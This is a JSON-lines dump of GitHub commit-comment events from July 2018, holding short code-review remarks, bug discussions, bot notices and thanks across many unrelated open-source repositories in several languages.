{"id":"7936676585","type":"CommitCommentEvent","actor":{"login":"gdelhumeau"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":29639331,"position":8,"line":298,"path":"xwiki-platform-core/xwiki-platform-notifications/xwiki-platform-notifications-ui/src/main/resources/XWiki/Notifications/Code/NotificationsMacro.xml","commit_id":"cc4eadd4e9ea1c369a912bf0c80e440e183b6d20","created_at":"2018-07-09T10:11:06Z","updated_at":"2018-07-09T10:11:06Z","author_association":"MEMBER","body":"I am adding the cache control to the REST resource.\r\n\r\nIn the meantime, I've looked at the [jquery documentation](http://api.jquery.com/jquery.ajax/) for \"cache: false\", and this is what they say:\r\n> **cache** (default: `true, false for dataType 'script' and 'jsonp'`)\r\n>Type: Boolean \r\n>If set to `false`, it will force requested pages not to be cached by the browser. **Note**: Setting cache to false will only work correctly with HEAD and GET requests. It works by appending \"_={timestamp}\" to the GET parameters. The parameter is not needed for other types of requests, except in IE8 when a POST is made to a URL that has already been requested by a GET.\r\n\r\nSo it seems my implementation was not that bad :)"}},"created_at":"2018-07-09T10:11:06Z"}
{"id":"7936676760","type":"CommitCommentEvent","actor":{"login":"benjaoming"},"repo":{"name":"jaraco/tempora"},"payload":{"comment":{"id":29639332,"position":1,"line":1,"path":"CHANGES.rst","commit_id":"87bd83bd8401cef6d6fc2997b87ffe8862a0665a","created_at":"2018-07-09T10:11:08Z","updated_at":"2018-07-09T10:11:08Z","author_association":"NONE","body":"Another reason: For instance, IIRC django-cms didn't put upper bounds on their dependencies until their 3.x series. So there was no real record of which versions that django-cms 2.x worked with, because it was just that moment in time when their set of dependencies worked. Later, some got upgraded, stuff broke. I'm telling you, getting a project from 2 years ago up and running in order to upgrade it (or just to use it), is a total chaos when none of the dependencies have records of which versions were working. You end up going through 20 changelogs just to find out which versions were released 2 years ago."}},"created_at":"2018-07-09T10:11:08Z"}
{"id":"7936677192","type":"CommitCommentEvent","actor":{"login":"BearishSun"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29639334,"position":5,"line":29,"path":"Source/Foundation/bsfCore/Animation/BsAnimationCurve.h","commit_id":"d797373e1d6ceb54defcfb3752f83a945d25f799","created_at":"2018-07-09T10:11:12Z","updated_at":"2018-07-09T10:11:12Z","author_association":"CONTRIBUTOR","body":"Indeed, [[attribute]] would be preferable. When I get a chance to test if everything still works properly I'll make the switch."}},"created_at":"2018-07-09T10:11:12Z"}
{"id":"7936680764","type":"CommitCommentEvent","actor":{"login":"Er9y714"},"repo":{"name":"firemodels/fds"},"payload":{"comment":{"id":29639340,"position":null,"line":null,"path":null,"commit_id":"520a0e41b2118fc162df6cb7a4e479d497641485","created_at":"2018-07-09T10:11:56Z","updated_at":"2018-07-09T10:11:56Z","author_association":"NONE","body":"Thanks for the info!"}},"created_at":"2018-07-09T10:11:56Z"}
{"id":"7936682181","type":"CommitCommentEvent","actor":{"login":"akccakcctw"},"repo":{"name":"UserInterfaceForFun/sass_practice"},"payload":{"comment":{"id":29639341,"position":9,"line":14,"path":"src/views/animation.html","commit_id":"7d182b244b117b159c85298cdf43be7cfeaadbce","created_at":"2018-07-09T10:12:13Z","updated_at":"2018-07-09T10:12:13Z","author_association":"CONTRIBUTOR","body":"closeBtn 只會有一個，可以用 querySelector 就好\r\n這樣下面使用就不需要再加 `[0]`"}},"created_at":"2018-07-09T10:12:13Z"}
{"id":"7936683121","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29639344,"position":null,"line":null,"path":null,"commit_id":"d7b24c2bdb96ac9f31da3cd11c43c3b60ba82308","created_at":"2018-07-09T10:12:25Z","updated_at":"2018-07-09T10:12:25Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=382)"}},"created_at":"2018-07-09T10:12:25Z"}
{"id":"7936683199","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29639346,"position":null,"line":null,"path":null,"commit_id":"d7b24c2bdb96ac9f31da3cd11c43c3b60ba82308","created_at":"2018-07-09T10:12:26Z","updated_at":"2018-07-09T10:12:26Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T10:12:26Z"}
{"id":"7936689132","type":"CommitCommentEvent","actor":{"login":"ser2400"},"repo":{"name":"ser2400/course-work-100-mathes-"},"payload":{"comment":{"id":29639358,"position":null,"line":null,"path":null,"commit_id":"5828789949ed44e379b06d3027bcb8698b47feb8","created_at":"2018-07-09T10:13:40Z","updated_at":"2018-07-09T10:13:40Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-09T10:13:40Z"}
{"id":"7936693272","type":"CommitCommentEvent","actor":{"login":"sergeyld99"},"repo":{"name":"sergeyld99/students"},"payload":{"comment":{"id":29639365,"position":null,"line":null,"path":null,"commit_id":"672ac5ac519a61e7bd731b0f9588cf0298943f4a","created_at":"2018-07-09T10:14:33Z","updated_at":"2018-07-09T10:14:33Z","author_association":"OWNER","body":"Добавил фильтр"}},"created_at":"2018-07-09T10:14:33Z"}
{"id":"7936701507","type":"CommitCommentEvent","actor":{"login":"pmelange"},"repo":{"name":"freifunk-berlin/firmware-packages"},"payload":{"comment":{"id":29639382,"position":null,"line":null,"path":null,"commit_id":"6da42fd59166d9d63917fd92d4e2f36f5e70400b","created_at":"2018-07-09T10:16:15Z","updated_at":"2018-07-09T10:16:15Z","author_association":"NONE","body":"The changes are now in two seperate commits.  \r\n\r\n* routing: 805f81adaf1ea8db69b4360a91e0890db781f6f9\r\n* macaddr: ab0ec05de03e2e06fe92fef2e7ccbf015ce14718"}},"created_at":"2018-07-09T10:16:15Z"}
{"id":"7936702338","type":"CommitCommentEvent","actor":{"login":"akccakcctw"},"repo":{"name":"UserInterfaceForFun/sass_practice"},"payload":{"comment":{"id":29639384,"position":26,"line":30,"path":"src/views/animation.html","commit_id":"7d182b244b117b159c85298cdf43be7cfeaadbce","created_at":"2018-07-09T10:16:25Z","updated_at":"2018-07-09T10:16:25Z","author_association":"CONTRIBUTOR","body":"ex:\r\n```javascript\r\nfor(var i = 0; i < list; i++) {\r\n  // do something\r\n}\r\nfor (var i = 0; i < anotherList; i++) {\r\n  // do another\r\n}\r\n\r\n# 兩層以上\r\nfor(var i = 0; i < aList; i++) {\r\n  for(var j = 0; j < aList[i].length; j++) {\r\n    // do something\r\n  }\r\n}\r\n\r\n```"}},"created_at":"2018-07-09T10:16:25Z"}
{"id":"7936703015","type":"CommitCommentEvent","actor":{"login":"Programming-Skills"},"repo":{"name":"Programming-Skills/my_website"},"payload":{"comment":{"id":29639390,"position":1,"line":1,"path":"lipsum.txt","commit_id":"11ba7d999759afb8bc1103cf22790fda35268eae","created_at":"2018-07-09T10:16:34Z","updated_at":"2018-07-09T10:16:34Z","author_association":"OWNER","body":"### Lipsum really"}},"created_at":"2018-07-09T10:16:34Z"}
{"id":"7936704696","type":"CommitCommentEvent","actor":{"login":"Programming-Skills"},"repo":{"name":"Programming-Skills/my_website"},"payload":{"comment":{"id":29639392,"position":null,"line":null,"path":null,"commit_id":"11ba7d999759afb8bc1103cf22790fda35268eae","created_at":"2018-07-09T10:16:55Z","updated_at":"2018-07-09T10:16:55Z","author_association":"OWNER","body":"Really"}},"created_at":"2018-07-09T10:16:55Z"}
{"id":"7936706142","type":"CommitCommentEvent","actor":{"login":"valkuc"},"repo":{"name":"espressif/ESP8266_NONOS_SDK"},"payload":{"comment":{"id":29639395,"position":null,"line":null,"path":null,"commit_id":"c76613457be934856bc3bcfce7117eb00300e020","created_at":"2018-07-09T10:17:14Z","updated_at":"2018-07-09T10:17:14Z","author_association":"NONE","body":"Thanks, now all clear. It will be good if this will be documented somewhere."}},"created_at":"2018-07-09T10:17:14Z"}
{"id":"7936708456","type":"CommitCommentEvent","actor":{"login":"Enerccio"},"repo":{"name":"mysql/mysql-server"},"payload":{"comment":{"id":29639406,"position":null,"line":null,"path":null,"commit_id":"43a506c0ced0e6ea101d3ab8b4b423ce3fa327d0","created_at":"2018-07-09T10:17:42Z","updated_at":"2018-07-09T10:17:42Z","author_association":"NONE","body":"seriously some shit and you can't even find the moron who commited it"}},"created_at":"2018-07-09T10:17:42Z"}
{"id":"7936710057","type":"CommitCommentEvent","actor":{"login":"wysaid"},"repo":{"name":"wysaid/android-gpuimage-plus"},"payload":{"comment":{"id":29639415,"position":null,"line":null,"path":null,"commit_id":"1823402caeeb43fabc94bacdc20ba1897690853b","created_at":"2018-07-09T10:18:04Z","updated_at":"2018-07-09T10:18:04Z","author_association":"OWNER","body":"#312 Fixed"}},"created_at":"2018-07-09T10:18:04Z"}
{"id":"7936712617","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29639420,"position":null,"line":null,"path":null,"commit_id":"75195c37a7055a89d36411fa210fea0b9eff879e","created_at":"2018-07-09T10:18:37Z","updated_at":"2018-07-09T10:18:37Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=383)"}},"created_at":"2018-07-09T10:18:37Z"}
{"id":"7936713462","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29639423,"position":null,"line":null,"path":null,"commit_id":"75195c37a7055a89d36411fa210fea0b9eff879e","created_at":"2018-07-09T10:18:48Z","updated_at":"2018-07-09T10:18:48Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T10:18:48Z"}
{"id":"7936713479","type":"CommitCommentEvent","actor":{"login":"davidcoutadeur"},"repo":{"name":"ltb-project/ppm"},"payload":{"comment":{"id":29639424,"position":null,"line":null,"path":null,"commit_id":"44165ed5a04decc7cb4fecc374065c760eceaeff","created_at":"2018-07-09T10:18:48Z","updated_at":"2018-07-09T10:18:48Z","author_association":"COLLABORATOR","body":"Ok, thanks.\r\nIn that case, you only check the first part of the RDN (OU=Sales for example)?\r\nWas it intended?"}},"created_at":"2018-07-09T10:18:48Z"}
{"id":"7936722046","type":"CommitCommentEvent","actor":{"login":"IzzySoft"},"repo":{"name":"JohnMH/BoogDroid"},"payload":{"comment":{"id":29639442,"position":null,"line":null,"path":null,"commit_id":"84193b1f4346f4f8e0ddaa42d712ab1622255d79","created_at":"2018-07-09T10:20:36Z","updated_at":"2018-07-09T10:20:36Z","author_association":"NONE","body":"@JohnMH do I read this correctly that this project was moved to GitLab? If so, may I suggest you point this out in the `README.md` here, so folks can \"follow up\" (and I can adjust F-Droid metadata accordingly)?"}},"created_at":"2018-07-09T10:20:36Z"}
{"id":"7936722551","type":"CommitCommentEvent","actor":{"login":"jselvi"},"repo":{"name":"WebGoat/WebGoat"},"payload":{"comment":{"id":29639443,"position":null,"line":null,"path":null,"commit_id":"84860e65f6c1f5d13ddc53b0f85129eb0b8459af","created_at":"2018-07-09T10:20:42Z","updated_at":"2018-07-09T10:20:42Z","author_association":"CONTRIBUTOR","body":"@misfir3 big pleasure :) I'm on the road at this moment, but I'll add an example as soon as I have some spare time."}},"created_at":"2018-07-09T10:20:42Z"}
{"id":"7936724126","type":"CommitCommentEvent","actor":{"login":"nabijaczleweli"},"repo":{"name":"Galactim/Sudoku"},"payload":{"comment":{"id":29639445,"position":null,"line":null,"path":null,"commit_id":"d5229aea8edb97cb40a200c823f348b2bb5aad9e","created_at":"2018-07-09T10:21:02Z","updated_at":"2018-07-09T10:21:02Z","author_association":"MEMBER","body":"*cough*"}},"created_at":"2018-07-09T10:21:02Z"}
{"id":"7936726781","type":"CommitCommentEvent","actor":{"login":"BearishSun"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29639456,"position":1,"line":11,"path":"Source/Foundation/bsfCore/Animation/BsSkeleton.cpp","commit_id":"7b3dc2d43452acd5b03fab6c5dd99de42d658b4d","created_at":"2018-07-09T10:21:34Z","updated_at":"2018-07-09T10:21:34Z","author_association":"CONTRIBUTOR","body":"Indeed, both make sense. I've made the necessary changes."}},"created_at":"2018-07-09T10:21:34Z"}
{"id":"7936728636","type":"CommitCommentEvent","actor":{"login":"michalvasko"},"repo":{"name":"CESNET/libyang"},"payload":{"comment":{"id":29639460,"position":null,"line":null,"path":null,"commit_id":"404aea2a441c511ccaad6ec4c24ba88f386ef25d","created_at":"2018-07-09T10:21:57Z","updated_at":"2018-07-09T10:21:57Z","author_association":"CONTRIBUTOR","body":"Hi Samuel,\r\nwe do not want our code to depend on GCC-specific constructs, so unfortunately no, it is not acceptable in the way you proposed it. However, I can imagine a dynamic solution when `cmake` would detect whether you are using `gcc` and if so, then it would use this function.\r\n\r\nRegards,\r\nMichal"}},"created_at":"2018-07-09T10:21:57Z"}
{"id":"7936729799","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29639462,"position":null,"line":null,"path":null,"commit_id":"b33ffb9a06b317be7864eb4225cbd80b1e45a812","created_at":"2018-07-09T10:22:12Z","updated_at":"2018-07-09T10:22:12Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=384)"}},"created_at":"2018-07-09T10:22:12Z"}
{"id":"7936729874","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29639463,"position":null,"line":null,"path":null,"commit_id":"b33ffb9a06b317be7864eb4225cbd80b1e45a812","created_at":"2018-07-09T10:22:13Z","updated_at":"2018-07-09T10:22:13Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T10:22:13Z"}
{"id":"7936730444","type":"CommitCommentEvent","actor":{"login":"NateWr"},"repo":{"name":"Vitaliy-1/pkp-lib"},"payload":{"comment":{"id":29639466,"position":4,"line":112,"path":"locale/en_US/user.xml","commit_id":"36363e57ed26f74623cd7062304406bf683b5dfc","created_at":"2018-07-09T10:22:20Z","updated_at":"2018-07-09T10:22:20Z","author_association":"NONE","body":"Ok, sorry, I've looked at this a bit closer now and I see how the two statements are separated. I think that this approach will raise some issues. \r\n\r\nFirst, the convention of a statement concluding with a `:` followed by a list won't work for every language. When possible, we try to encapsulate the list inside of the translation string so that it can be positioned according to the needs of a specific language. That probably won't work terribly well in this case.\r\n\r\nSecond, we have several active users with 100+ journals. The list would become long and unmanageable by the end.\r\n\r\nThird, and related, we already have an issue with listing out each journal and asking the user to sign up for each one. We should try and minimize problem (2) by pulling it into the user role signup. \r\n\r\n![selection_031](https://user-images.githubusercontent.com/2306629/42445038-bd9e5e28-8369-11e8-8e3e-7b74f748067f.png)\r\n\r\nMaybe if the user selects a role in a journal, a consent statement could appear? \r\n\r\n(We also need to make sure we're not displaying or linking to privacy statements for journals that don't have them.)\r\n\r\nFor all of these reasons, I think we really need to step back and reconsider what we're doing here. Things could get very hostile for the user very quickly, and our site-wide registration form is already a bit of a mess. In particular, we should make sure we support the site-wide consent statement option I mentioned [in this comment](https://github.com/pkp/pkp-lib/issues/3836#issuecomment-402765992), so that larger providers can keep their registration forms cleaner."}},"created_at":"2018-07-09T10:22:20Z"}
{"id":"7936730888","type":"CommitCommentEvent","actor":{"login":"crackcomm"},"repo":{"name":"crackcomm/Dynamic"},"payload":{"comment":{"id":29639467,"position":null,"line":null,"path":null,"commit_id":"03259a3c225f072bf1016c7865c0296164ae32d6","created_at":"2018-07-09T10:22:25Z","updated_at":"2018-07-09T10:22:25Z","author_association":"OWNER","body":"I've currently did the opposite, build with `HAVE_CUDA` as default because OpenCL has not been yet tested at all and with CUDA we can at least make sure it runs and doesn't segfault."}},"created_at":"2018-07-09T10:22:25Z"}
{"id":"7936736526","type":"CommitCommentEvent","actor":{"login":"dchikhaoui"},"repo":{"name":"ltb-project/ppm"},"payload":{"comment":{"id":29639481,"position":null,"line":null,"path":null,"commit_id":"44165ed5a04decc7cb4fecc374065c760eceaeff","created_at":"2018-07-09T10:23:42Z","updated_at":"2018-07-09T10:23:42Z","author_association":"CONTRIBUTOR","body":"Yes David. That is correct and was intended for the sake of simplicity. It can definitely be considered as a point to improve."}},"created_at":"2018-07-09T10:23:42Z"}
{"id":"7936738032","type":"CommitCommentEvent","actor":{"login":"Beep6581"},"repo":{"name":"Beep6581/RawTherapee"},"payload":{"comment":{"id":29639488,"position":null,"line":null,"path":null,"commit_id":"eeebe587ba4a899a10972c23a8e630ffa012e5d7","created_at":"2018-07-09T10:24:02Z","updated_at":"2018-07-09T10:24:02Z","author_association":"OWNER","body":"I consider that a feature. If I make a PP3 which depends on a curve being a certain way, I would like the curve to stay that way when I open the PP3 in a future version so as to not break the look."}},"created_at":"2018-07-09T10:24:02Z"}
{"id":"7936766426","type":"CommitCommentEvent","actor":{"login":"samuel-gauthier"},"repo":{"name":"CESNET/libyang"},"payload":{"comment":{"id":29639553,"position":null,"line":null,"path":null,"commit_id":"404aea2a441c511ccaad6ec4c24ba88f386ef25d","created_at":"2018-07-09T10:30:04Z","updated_at":"2018-07-09T10:30:04Z","author_association":"NONE","body":"Hi Michal,\r\n\r\nThat is what I suspected, and why I did not take the time to do a pull request. This patch is enough for us for now. Thanks for the dynamic solution idea, we will think about it when we submit the pull request.\r\n\r\nRegards,\r\nSamuel"}},"created_at":"2018-07-09T10:30:04Z"}
{"id":"7936767287","type":"CommitCommentEvent","actor":{"login":"BearishSun"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29639555,"position":23,"line":255,"path":"Source/Foundation/bsfCore/Private/RTTI/BsMaterialParamsRTTI.h","commit_id":"f66b81380ac2e0165f4d68abf8db01c7875fd192","created_at":"2018-07-09T10:30:15Z","updated_at":"2018-07-09T10:30:15Z","author_association":"CONTRIBUTOR","body":"Isn't `std::array` for static arrays only? But I agree it would be nice to have more safety - I've been thinking about how to get rid of much of the direct memory manipulation but haven't found a good way yet. A custom dynamic array class that accepts a variety of `bsf` allocators out of the box might be an option to solve at least some of the problems."}},"created_at":"2018-07-09T10:30:15Z"}
{"id":"7936769574","type":"CommitCommentEvent","actor":{"login":"cjongseok"},"repo":{"name":"cjongseok/mtproto"},"payload":{"comment":{"id":29639560,"position":80,"line":1082,"path":"session.go","commit_id":"828ede96d4c17642808772cdf6c7eed7ed4db2d6","created_at":"2018-07-09T10:30:40Z","updated_at":"2018-07-09T10:30:40Z","author_association":"OWNER","body":"It selects the general purpose DC for the given IP version"}},"created_at":"2018-07-09T10:30:40Z"}
{"id":"7936771129","type":"CommitCommentEvent","actor":{"login":"FooBarWidget"},"repo":{"name":"phusion/passenger"},"payload":{"comment":{"id":29639566,"position":null,"line":null,"path":null,"commit_id":"0766bb303ad8009c6061206f3aafe231c4f1c3ff","created_at":"2018-07-09T10:30:59Z","updated_at":"2018-07-09T10:30:59Z","author_association":"MEMBER","body":"That's a good question. After reviewing src/agent/Core/Controller/SendRequest.cpp constructHeaderForSessionProtocol(), it seems the Core Controller side does not set 'TRANSFER_ENCODING' but 'HTTP_TRANSFER_ENCODING'.\r\n\r\nResearch into the Rack and Puma codebases revealed that they don't care about the \"Transfer-Encoding\" header in the request, only in the response.\r\n\r\nMaybe this is a bug? The original commit was supposed to fix \"Transfer-Encoding: chunked\" in combination with Rack socket hijacking, but that concerns the *response*, not the request. Maybe I was overzealous with search/replace and substituted code that handled the request too, even though I shouldn't have.\r\n\r\nWhat happens if you edit tee_input.rb and change `TRANSFER_ENCODING = \"TRANSFER_ENCODING\".freeze` to `TRANSFER_ENCODING = \"HTTP_TRANSFER_ENCODING\".freeze`?"}},"created_at":"2018-07-09T10:30:59Z"}
{"id":"7936773590","type":"CommitCommentEvent","actor":{"login":"greut"},"repo":{"name":"exoscale/reporter"},"payload":{"comment":{"id":29639573,"position":31,"line":189,"path":"src/spootnik/reporter.clj","commit_id":"8b116a5b4d1ff8c12b3d274e967a0f2bbe5f9670","created_at":"2018-07-09T10:31:29Z","updated_at":"2018-07-09T10:31:29Z","author_association":"MEMBER","body":"`raven (when sentry raven)` is probably good enough.\r\n\r\nhttps://github.com/ztellman/aleph/blob/7b41f07aaad7fbfc9f3dd8a43e93d373ffbbf778/src/aleph/http.clj#L247"}},"created_at":"2018-07-09T10:31:29Z"}
{"id":"7936776781","type":"CommitCommentEvent","actor":{"login":"MIna-Maher"},"repo":{"name":"MIna-Maher/hello-world"},"payload":{"comment":{"id":29639578,"position":3,"line":3,"path":"README.md","commit_id":"1c47be3af25ae871084f83521c112ffb68112063","created_at":"2018-07-09T10:32:08Z","updated_at":"2018-07-09T10:32:08Z","author_association":"OWNER","body":"wrong syntax"}},"created_at":"2018-07-09T10:32:08Z"}
{"id":"7936778524","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"remilia15/android_device_samsung_scx30g-common"},"payload":{"comment":{"id":29639580,"position":24,"line":93,"path":"ril/secril-shim/secril-shim.cpp","commit_id":"b4f100e04570338ae4d5a1fca9b7f355f0407a06","created_at":"2018-07-09T10:32:29Z","updated_at":"2018-07-09T10:32:29Z","author_association":"CONTRIBUTOR","body":"Why free ```cds``` before passing it to original ril onRequest?"}},"created_at":"2018-07-09T10:32:29Z"}
{"id":"7936779789","type":"CommitCommentEvent","actor":{"login":"nemocaledonie"},"repo":{"name":"nicholascw/TM1650"},"payload":{"comment":{"id":29639584,"position":null,"line":null,"path":null,"commit_id":"e662db99053e2c17b6a9934f7aa8a18ef253b72b","created_at":"2018-07-09T10:32:45Z","updated_at":"2018-07-09T10:32:45Z","author_association":"NONE","body":"Hi,\r\nThanks for the buttons but a small issue for ESP8266 (Wemos D1 mini) : in  #include <avr/pgmspace.h> don't work with ESP8266, use #include <pgmspace.h> or test (no time to write here), and your add 👍  int TM1650::displayInt(int aI);\r\nint TM1650::getKeycode();\r\ndon't work with ESP8266.\r\nUse :\r\n int displayInt(int aI);\r\n int getKeycode();\r\n\r\nthat's works.\r\nFor the moment small problem with the scanning of the keys (slowwwww), when I found a solve I 'll come back :-)\r\n"}},"created_at":"2018-07-09T10:32:45Z"}
{"id":"7936780065","type":"CommitCommentEvent","actor":{"login":"sid321axn"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29639585,"position":19,"line":19,"path":"Vidly/Controllers/CustomersController.cs","commit_id":"b727a26e1b4b88abe84a8b48208fec537db2ed43","created_at":"2018-07-09T10:32:49Z","updated_at":"2018-07-09T10:32:49Z","author_association":"NONE","body":"Error is coming IEnumerable <Customer> has not contain definition for SingleOrDefault "}},"created_at":"2018-07-09T10:32:49Z"}
{"id":"7936780769","type":"CommitCommentEvent","actor":{"login":"ShumanskiYuri"},"repo":{"name":"ShumanskiYuri/TestGitHub"},"payload":{"comment":{"id":29639586,"position":5,"line":3,"path":"Shuma.txt","commit_id":"b2e22a8ce4224b46dac59cae4f3a125e161c84df","created_at":"2018-07-09T10:32:57Z","updated_at":"2018-07-09T10:32:57Z","author_association":"OWNER","body":"\r\nTret'ya zapis'"}},"created_at":"2018-07-09T10:32:57Z"}
{"id":"7936781102","type":"CommitCommentEvent","actor":{"login":"lgarithm"},"repo":{"name":"tensorlayer/tensorlayer"},"payload":{"comment":{"id":29639587,"position":4,"line":4,"path":"scripts/download_and_install_cuda9_ubuntu.sh","commit_id":"2bc6094b613409588442e8e6d114b6bab68bf4aa","created_at":"2018-07-09T10:33:02Z","updated_at":"2018-07-09T10:33:02Z","author_association":"MEMBER","body":"Is this a valid shell script?\r\nI think ' or \" should be used instead of `"}},"created_at":"2018-07-09T10:33:02Z"}
{"id":"7936785632","type":"CommitCommentEvent","actor":{"login":"luomai"},"repo":{"name":"tensorlayer/tensorlayer"},"payload":{"comment":{"id":29639594,"position":4,"line":4,"path":"scripts/download_and_install_cuda9_ubuntu.sh","commit_id":"2bc6094b613409588442e8e6d114b6bab68bf4aa","created_at":"2018-07-09T10:34:01Z","updated_at":"2018-07-09T10:34:01Z","author_association":"MEMBER","body":"Yes, let me fix it."}},"created_at":"2018-07-09T10:34:01Z"}
{"id":"7936785644","type":"CommitCommentEvent","actor":{"login":"blubber"},"repo":{"name":"AntagonistHQ/circus"},"payload":{"comment":{"id":29639595,"position":22,"line":658,"path":"circus/arbiter.py","commit_id":"b21eab5c65040cda33199dac72cc622205bb7afb","created_at":"2018-07-09T10:34:01Z","updated_at":"2018-07-09T10:34:01Z","author_association":"NONE","body":"Is die `sync` nod nodig?"}},"created_at":"2018-07-09T10:34:01Z"}
{"id":"7936792919","type":"CommitCommentEvent","actor":{"login":"NoChance777"},"repo":{"name":"DefinitelyTyped/DefinitelyTyped"},"payload":{"comment":{"id":29639616,"position":null,"line":null,"path":null,"commit_id":"d7c858f68be01b276ba59d01263e3d5f53afd118","created_at":"2018-07-09T10:35:37Z","updated_at":"2018-07-09T10:35:37Z","author_association":"NONE","body":"That shit broke my app"}},"created_at":"2018-07-09T10:35:37Z"}
{"id":"7936792992","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29639617,"position":null,"line":null,"path":null,"commit_id":"56d28073770191c6a4a66faf976b9c549571289a","created_at":"2018-07-09T10:35:39Z","updated_at":"2018-07-09T10:35:39Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=387)"}},"created_at":"2018-07-09T10:35:39Z"}
{"id":"7936793086","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29639618,"position":null,"line":null,"path":null,"commit_id":"56d28073770191c6a4a66faf976b9c549571289a","created_at":"2018-07-09T10:35:40Z","updated_at":"2018-07-09T10:35:40Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T10:35:40Z"}
{"id":"7936796210","type":"CommitCommentEvent","actor":{"login":"blubber"},"repo":{"name":"AntagonistHQ/circus"},"payload":{"comment":{"id":29639623,"position":null,"line":null,"path":null,"commit_id":"b21eab5c65040cda33199dac72cc622205bb7afb","created_at":"2018-07-09T10:36:22Z","updated_at":"2018-07-09T10:36:22Z","author_association":"NONE","body":"Ziet er goed uit, enige wat ik mis is dat je op r661 de handler verwijdert maar nooit meer toevoegd. Wat gebeurt er nadat de redis instance weg gaat?"}},"created_at":"2018-07-09T10:36:22Z"}
{"id":"7936801931","type":"CommitCommentEvent","actor":{"login":"Riey"},"repo":{"name":"Riey/eraTHYMKR"},"payload":{"comment":{"id":29639644,"position":20,"line":368,"path":"ERB/SYS/CONFIG/CONFIG0.ERB","commit_id":"f9d5fbe4234adde1a544019c884ba786bd011bb6","created_at":"2018-07-09T10:37:38Z","updated_at":"2018-07-09T10:37:38Z","author_association":"OWNER","body":"이건 변경하신 이유가 뭔가요?"}},"created_at":"2018-07-09T10:37:38Z"}
{"id":"7936804542","type":"CommitCommentEvent","actor":{"login":"cnockemann"},"repo":{"name":"HerrAlexander/springBatchPerformanceMonitoring"},"payload":{"comment":{"id":29639648,"position":12,"line":12,"path":"src/main/java/de/viadee/spring/batch/infrastructure/SBPMConfiguration.java","commit_id":"06a8f609ee12f512694529a454ef866b5c24fe97","created_at":"2018-07-09T10:38:13Z","updated_at":"2018-07-09T10:38:13Z","author_association":"NONE","body":"Nutze hier am besten die @PropertySource Funktion von Spring. Das erspart dir den manuellen Umgang mit der .properties Datei."}},"created_at":"2018-07-09T10:38:13Z"}
{"id":"7936805557","type":"CommitCommentEvent","actor":{"login":"BearishSun"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29639650,"position":49,"line":281,"path":"Source/Foundation/bsfCore/Private/RTTI/BsMaterialParamsRTTI.h","commit_id":"f66b81380ac2e0165f4d68abf8db01c7875fd192","created_at":"2018-07-09T10:38:27Z","updated_at":"2018-07-09T10:38:27Z","author_association":"CONTRIBUTOR","body":"They are. I'll add this to my task list and make the switch when we move to C++17."}},"created_at":"2018-07-09T10:38:27Z"}
{"id":"7936807976","type":"CommitCommentEvent","actor":{"login":"CelalTEMIZ"},"repo":{"name":"CelalTEMIZ/CSE-222-Data-Structures-And-Algorithms"},"payload":{"comment":{"id":29639653,"position":null,"line":null,"path":null,"commit_id":"68c3f2d7982cc2d660d19a5eb934722e265c11fe","created_at":"2018-07-09T10:39:00Z","updated_at":"2018-07-09T10:39:00Z","author_association":"OWNER","body":"Hotel Management System"}},"created_at":"2018-07-09T10:39:00Z"}
{"id":"7936809583","type":"CommitCommentEvent","actor":{"login":"tjikkun"},"repo":{"name":"AntagonistHQ/circus"},"payload":{"comment":{"id":29639654,"position":22,"line":658,"path":"circus/arbiter.py","commit_id":"b21eab5c65040cda33199dac72cc622205bb7afb","created_at":"2018-07-09T10:39:22Z","updated_at":"2018-07-09T10:39:22Z","author_association":"COLLABORATOR","body":"Mijn aanname is een beetje dat ie dan niet vanuit een ander event `self.socket_event = True|False` toggled"}},"created_at":"2018-07-09T10:39:22Z"}
{"id":"7936816402","type":"CommitCommentEvent","actor":{"login":"BearishSun"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29639671,"position":59,"line":81,"path":"Source/Foundation/bsfCore/Managers/BsResourceListenerManager.cpp","commit_id":"4f2949221cf57c08da267aeb2ead4cf61ba134b9","created_at":"2018-07-09T10:40:54Z","updated_at":"2018-07-09T10:40:54Z","author_association":"CONTRIBUTOR","body":"I'd usually use `std::swap` for this situation, but in this case one is a `std::set` and other a `std::vector`."}},"created_at":"2018-07-09T10:40:54Z"}
